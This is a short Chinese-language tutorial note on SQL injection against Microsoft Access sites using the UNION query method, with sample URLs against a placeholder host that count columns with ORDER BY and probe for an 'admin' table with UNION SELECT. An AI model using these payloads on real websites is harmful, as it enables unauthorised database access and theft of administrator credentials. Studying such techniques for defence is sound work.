1、Sql注入产生条件
1、必须有参数传递
2、参数值带入数据库查询并执行
2、access注入攻击片段-联合查询法
1、判断注入
2、猜解表名
3、猜解列名
4、猜解数据
猜解表名的过程如下:
1)Order by 22 22 代表查询的列名的数目有22个
http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 order by 2cc2 正常
http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 order by 23 错误
2)猜解表名 确定存在admin表名
http://www.test.com/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin